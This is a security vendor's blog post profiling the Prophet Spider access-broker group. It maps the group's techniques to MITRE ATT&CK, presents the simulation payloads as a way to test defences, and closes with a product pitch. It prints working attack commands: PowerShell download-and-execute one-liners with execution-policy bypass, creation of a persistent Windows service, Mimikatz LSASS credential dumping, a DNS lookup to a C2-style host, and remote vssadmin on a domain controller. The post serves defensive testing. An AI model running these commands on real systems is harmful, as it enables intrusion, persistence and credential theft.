Prophet Spider Threat Actor Explained

Written by Sıla Özeren Hacıoğlu | Nov 7, 2025 10:30:00 AM

Prophet Spider is a financially motivated intrusion group active since at least 2017. It operates as an initial access broker within the ransomware economy. Rather than deploying ransomware directly, the group compromises corporate networks and sells or rents access to affiliates linked to operations like Conti, Ryuk, and BlackCat (ALPHV).

Prophet Spider primarily targets organizations in North America and Europe, exploiting vulnerabilities in internet-facing applications such as Oracle WebLogic and Apache Tomcat. Once inside, it deploys web shells, steals credentials, and uses tools like PowerShell and Cobalt Strike for reconnaissance and lateral movement.

The group’s motive is purely commercial. By maintaining stealth, covering traces, and reusing infrastructure across campaigns, Prophet Spider has become a critical enabler for large-scale ransomware attacks, representing the organized, profit-driven side of modern cybercrime.

In this blog, we examine Prophet Spider’s intrusion campaigns mapped to the MITRE ATT&CK framework.

Command and Scripting

T1105 - Ingress Tool Transfer

Downloading malicious binaries via Invoke-WebRequest

Prophet Spider is known to download customized tools and malicious binaries using PowerShell’s Invoke-WebRequest utility.

How Does Picus Help?

powershell.exe Invoke-WebRequest -Uri "%remotefile-9786%" -OutFile "$Env:TMP\dummy.exe"

The payload downloads a remote binary into a writable temp location using PowerShell’s web request utility, then stages it for later execution. This compact transfer mirrors how attackers fetch tools while blending with normal outbound traffic.

The designed payload leverages:

Invoke-WebRequest (native PowerShell HTTP fetch) to perform a direct file transfer,
a forged or normal User-Agent/HTTP header behavior to resemble benign client requests, and
writing to a temp folder ($Env:TMP) to stage the artifact in a predictable, writable location.

Thus, this payload safely simulates an ingress tool transfer (download → stage), allowing defenders to observe the same runtime artifacts (outbound HTTP fetch, requested URL, staged file path, and associated process command line) in a controlled manner.

T1071 - Application Layer Protocol

Querying DNS for C2 server using "nslookup" command

Prophet Spider is known to query DNS for command-and-control hostnames using the nslookup utility.

How Does Picus Help?

nslookup.exe ping.attack.picusops.io

The payload performs a DNS lookup for a C2 hostname, turning hostname resolution into a signal that a remote controller may be reachable while leaving minimal on-disk artifacts.

It leverages:

nslookup.exe to perform a direct DNS query (simple, native tool invocation),
a C2-style hostname (ping.attack.picusops.io) to test resolver behavior and recursive lookup paths, and
DNS traffic which often bypasses HTTP/HTTPS proxies and can blend with routine name resolution noise.

This payload safely simulates a DNS-based C2 lookup so defenders can observe runtime artifacts, DNS queries, queried hostnames, resolver chain, and process → network correlation, without contacting a live malicious server.

Execution

T1059:001 - Command and Scripting Interpreter: PowerShell

Downloading and executing malicious binaries via PowerShell

Prophet Spider is known to download and execute payloads using PowerShell.

How Does Picus Help?

powershell.exe -executionpolicy bypass -noprofile -w hidden $var = new-Object System.Net.webClient; $var.Headers['User-Agent']='Windows'; $var.downloadfile('%remotefile-16645%', '%temp%\dummy.exe'); & start %temp%\dummy.exe

The payload fetches a binary from the internet, stages it in a writable temp location, and launches it immediately, all in one compact PowerShell invocation that minimizes noise and avoids profile/policy checks.

It leverages:

-executionpolicy bypass -noprofile -w hidden to run quietly and skip local policy/profile interference,
System.Net.WebClient (DownloadFile) to perform a native HTTP(S) fetch that resembles normal client traffic,
a forged User-Agent header to blend with benign requests, and
writing to %TEMP% plus an immediate start to turn the fetch into active execution.

The designed payload safely simulates an end-to-end staging-and-launch sequence.

Executing Powershell script by using DownloadString and Invoke-Expression

Prophet Spider is known to execute in-memory PowerShell scripts using the DownloadString + Invoke-Expression pattern.

How Does Picus Help?

powershell.exe -nop -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('%remotefile-9776%')"

The payload fetches a script over HTTP(S) and runs it directly in memory without writing a file to disk, avoiding many traditional forensic artifacts and reducing cleanup effort.

It relies on;

trusted runtime APIs (PowerShell + .NET),
masks intent in a single compact invocation (-nop -exec bypass suppresses profiles and policy), and
passes the remote code to IEX for immediate execution.

Persistance

T1569.002 - System Services: Service Execution

Creating a new service "windowsinspectionupdate"

The Prophet Spider e-crime group has been observed creating a new service called “windowsinspectionupdate” to stage and launch a payload via a trusted system binary.

How Does Picus Help?

#Process 1
sc.exe create windowsinspectionupdate binpath= "cmd /c start c:/windows/temp/tmp/lld.exe c:/windows/temp/tmp/tmp.log"
#Process 2
sc.exe description windowsinspectionupdate "windows inspection integrity"
# Process 3
sc.exe config windowsinspectionupdate start= auto

The sequence creates a Windows service that stages and launches a payload via a trusted system binary, persists across reboots, and presents benign metadata to reduce suspicion.

It leverages:

a binpath that points to cmd /c start … (trusted binary used as the launcher),
start to spawn the payload as a detached child process (decouples execution from the service host),
staging the payload in a writable temp folder (c:\windows\temp\tmp\…) to simplify write/execute, and
setting a description plus start= auto to appear legitimate and ensure boot-time persistence.

So this sequence safely simulates service-based persistence so defenders can observe the same runtime artifacts (service registry entries, service arguments, detached parent → child process relationships, and staged file paths) without installing or running real malicious software.

Credential Access

T1003.001 - OS Credential Dumping: LSASS Memory

Prophet Spider leverages the well-known Mimikatz tool to dump LSASS memory.

Gathering credentials using Mimikatz (2.2.0 20220617) tool

How Does Picus Help?

%TMP%\mimikatz.exe privilege::debug sekurlsa::logonPasswords exit

The payload attempts to extract credentials from LSASS memory using Mimikatz, producing plaintext credentials, NTLM/LM hashes, and Kerberos tickets if present, a direct, high-impact credential-access technique.

It leverages:

privilege::debug to enable SeDebugPrivilege required to open the LSASS process,
sekurlsa::logonPasswords to enumerate and dump in-memory logon credentials and tickets,
execution from a writable temp path (%TMP%) to stage the tool without touching protected system folders, and
a native-looking tool name/version (Mimikatz) to mirror real attacker tooling and behavior.

This payload command safely simulates LSASS memory credential dumping, letting defenders can observe the same runtime artifacts (process handles to lsass.exe, SeDebugPrivilege elevation, anomalous process memory reads, and resulting credential artifacts) without using real stolen credentials.

Impact

T1490 - Inhibit System Recovery

Creating shadow copy on Domain Controller via vssadmin tool

Prophet Spider is known to create shadow copies on domain controllers using the vssadmin utility.

How Does Picus Help?

Powershell.exe -c $domainController = ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).DomainControllers | Where-Object { $_.Roles -contains 'PDCRole' } | Select-Object -ExpandProperty Name; Invoke-Command -ComputerName $domainController -ScriptBlock { $shadowCopy = vssadmin create shadow /for=C:; $shadowCopy.Path } | ForEach-Object { $_ | Out-File -FilePath "$env:TMP\CarbonCopy.tmp" -Append -Force; if ($LASTEXITCODE -eq 0) { Write-Host "[+] Successful!" } }

The payload remotely invokes vssadmin create shadow on a domain controller, captures the command output to a temp file, and reports success, simulating attacker activity that touches Volume Shadow Copy Service (VSS) on a high-value host without actually harming production recovery data.

It leverages:

AD query to locate a domain controller (GetCurrentDomain().DomainControllers and role filter),
Invoke-Command (PowerShell remoting) to run vssadmin on the remote DC (WinRM/remote execution pattern),
vssadmin create shadow /for=C: to request a VSS shadow copy of the target volume,
piping output into a temp file for later analysis, and
an exit-code check to surface success/failure of the remote operation.

So this payload safely simulates remote VSS activity on a domain controller so defenders can observe the same runtime and network artifacts (AD lookup, WinRM/PowerShell remoting, vssadmin invocation, shadow-copy responses, and temp-file artifacts) without disrupting real recovery points.

How Picus Helps Defend Against Prophet Spider Attacks?

The Picus Security Validation Platform safely simulates Prophet Spider e-crime threat group’s Windows endpoint campaigns, replicating the malware’s new plug-in functionality for validation purposes. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies, before adversaries can exploit them.

You can also test your defenses against hundreds of other threat actors, such as Salt Typhoon APT, APT28, Lazarus APT, within minutes with a 14-day free trial of the Picus Platform.

Threat ID	Threat Name	Attack Module
67113	Prophet Spider Threat Group Campaign	Windows Endpoint

View full post